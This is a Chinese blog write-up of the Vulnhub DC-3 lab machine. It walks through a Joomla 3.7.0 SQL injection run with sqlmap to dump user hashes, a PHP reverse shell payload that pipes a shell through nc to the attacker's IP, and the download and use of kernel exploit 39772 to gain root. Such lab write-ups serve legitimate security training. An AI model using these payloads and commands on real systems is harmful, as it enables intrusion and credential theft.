Vulnhub靶机 DC-3

最新推荐文章于 2024-06-29 21:30:35 发布
最新推荐文章于 2024-06-29 21:30:35 发布
阅读量397 收藏
点赞数 1
分类专栏: vulnhub 文章标签: 信息安全 安全 经验分享 恰饭
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/104993342
版权

扫描ip

在这里插入图片描述
找到靶机192.168.0.131
发现开放80端口
必须访问一下啊

在这里插入图片描述
这个样子的,没啥信息

在这里插入图片描述
上插件 wappalyzer 火狐的指纹信息插件

在这里插入图片描述
nmap也扫了一下

实锤了,Joomla的cms
那肯定要用配套的joomscan扫一下啊
没事就扫一扫,扫扫更健康

在这里插入图片描述

没安装,先装一下

apt-get install joomscan 安装命令

在这里插入图片描述
看见版本号了,3.7.0,还有后台地址
后台地址都出来了
肯定先登陆一下啊

joomscan -u 192.168.0.131

在这里插入图片描述
我也不知道我再想什么
啥啥账号都没有
就去登录后台
拿or 1=1去登录啊?
还是去找一下
看看这个版本有没有漏洞吧

在这里插入图片描述
还真有,就一个!!!
我就喜欢这种的
要有漏洞,就给我报一个出来
省的爆出一大堆
还得挨个试
麻烦

searchsploit joomla 3.7.0

在这里插入图片描述
看一眼这漏洞说明吧
也没啥事干
就当练练英语阅读了

在这里插入图片描述
解释很清晰啊
就直接看着利用就行了
直接出库名了

sqlmap -u "http://192.168.0.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述
表名get!
接下来看我文章的小伙伴
要是跟着手打操作的
一定要注意
那个表名不是 _
用到表名的时候
一定要去爆出的数据里复制表名
坑人啊
我以为是 _
一直报错,气死我了

sqlmap -u "http://192.168.0.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

在这里插入图片描述
字段名get!
column不应该加s么
我没加s
不知道为啥没报错
不管了

sqlmap -u "http://192.168.0.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T #_users --column

在这里插入图片描述
数据get!
hash值直接破解
snoopy
(因为我又忘截图了,太累了,我实在是懒得再去弄一遍了,kali好多自带的hash破解软件,可以搜一下)

sqlmap -u "http://192.168.0.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D 'joomladb' -T '#__users' -C 'username,name,password' --dump

在这里插入图片描述
刚才的后台地址用上了!
直接登录!!!!
还好页面我没关

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

有文件上传的地方,直接来个写个文件进去
然后去访问一下文件

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip地址 端口号 >/tmp/f');?>

在这里插入图片描述
在这里插入图片描述

先用nc去监听端口
然后访问网站
shell
get!!!
(本机ip被我搞错了,害得我又因为不能nc,卡住了,一耗就是一下午,要疯了)

在这里插入图片描述

然后看一眼操作系统的版本(又没截图,我随便找了一个,嘿嘿)
4.4.0
查了一下
是ubuntu 16.04
接下来怎么说!
迷茫了
百度一下

uname -a

在这里插入图片描述
找漏洞,又是找漏洞
你看看这么一大堆
密密麻麻的
我就头皮发麻
不挨个试了
看别人说39772好使
直接用

searchsploit ubuntu 16.04

在这里插入图片描述
在这里插入图片描述下载错地方了
应该在nc那个窗口里输入下载命令
下载之后,找到39772.zip
解压

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
unzip 39772.zip

在这里插入图片描述在这里插入图片描述
继续解压

tar -xvf exploit.tar

在这里插入图片描述
在这里插入图片描述
应该出来了四个文件
然后输入:

./compile.sh
./doubleput    没有.c 没有.c 没有.c  重要的事情说三遍
whoami
id

在这里插入图片描述

看一下
是root
老铁没毛病!在这里插入图片描述看一下flag!
over!
开心!

菜浪马废
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1457
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4084
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
vulunhub靶机--DC-2测试思路
最新发布
hxh108的博客
06-29 465
bin/sh即可提取到root权限,之后进入root文件中,就可看到最终的flag文件。根据flag1的提示,使用cewl生成有关靶机的弱口令字典,之后使用wpscan扫描靶机wordpress的用户名。命令:wpscan --url http://dc-2/ -U 4.txt -P 192.168.206.135dict.txt。成功后,回退一个目录,进入Jerry中即可发现flag4.txt,或者直接su切换到Jerry查看。命令:wpscan --url http://dc-2/ -e u。
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 943
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
VulnHub靶机 DC-8 打靶实战 详细渗透过程
rumil的博客
04-24 1388
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1046
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
vulnhub靶机dc-3
m0_52328368的博客
08-14 1302
dc-3靶机教程
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 178
DC-1详解
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
rumil的博客
04-20 1032
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
Vulnhub-DC-3靶机实战
御七彩虹猫
03-31 1048
Vulnhub-DC-3靶机实战
vulnhub靶机实战DC-3
Varin
06-04 922
vulnhub靶机实战DC-3
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机 PWNlab_init
菜浪马废的博客
04-15 1235
找到靶机ip 扫描到端口 发现/config.php LFI 学习链接https://blog.csdn.net/qq_29419013/article/details/81202358 解码 得到了一个数据库账号 登录进去,看见三组账号(登录时加-D,不然不能登录) kent | Sld6WHVCSkpOeQ== JWzXuBJJNy mike | U0lmZHNURW42S...
Vulnhub靶机 scream
菜浪马废的博客
04-27 946
打开scream.exe 选择winxp_pro_with_sp2.iso 下载链接:ed2k://|file|sc_winxp_pro_with_sp2.iso|629227520|505B810E128351482AF8B83AC4D04FD2|/ 等待加载 然后点击3的那个按钮 生成一个.iso文件 这个.iso文件就是靶机了 然后去VM里新建虚拟机就可以了 直接试试ssh 搜索漏...
Vulnhub靶机 IMF
菜浪马废的博客
04-16 935
ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ== flag2{aW1mYWRtaW5pc3RyYXRvcg==} imfadministratorroot 直接找到了flag2 进入contact界面 拿到flag1 解码 all the files root flag2得到的字符串 去点root 访问一下 得到登录页面 可以猜解用户名 ...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值